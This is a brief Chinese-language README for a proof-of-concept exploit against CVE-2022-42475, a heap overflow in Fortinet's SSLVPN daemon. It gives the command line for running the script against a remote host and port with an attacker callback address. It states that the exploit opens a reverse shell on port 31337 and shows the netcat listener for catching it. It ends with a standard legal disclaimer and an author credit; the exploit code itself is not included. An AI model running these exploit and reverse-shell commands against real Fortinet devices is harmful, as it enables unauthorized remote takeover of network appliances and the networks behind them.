https://nvd.nist.gov/vuln/detail/CVE-2022-42475 用于利用 Fortinet 的 SSLVPN 守护进程中堆溢出的 POC 代码
这是一个快速而粗糙的 POC,除非你极其幸运,否则很可能无法在任何地方工作。它依赖于版本,并包含一些硬编码的偏移量,这些偏移量很可能因系统而异。
python3 cve-2022-42475.py 远程主机 远程端口 本地主机 '命令'
python3 cve-2022-42475.py 192.168.10.1 8443 10.10.1.1 'ls -la /'
该 POC 使用一条 Python 命令在端口 31337 上设置反向 shell
nc -lvnp 31337
本项目仅供教育和道德测试之用。未经事先双方同意,使用此工具攻击目标是违法的。开发者不承担任何法律责任,并且不对因使用此工具造成的任何滥用或损害负责。
感谢 Alain M - Twitter : @plopz0r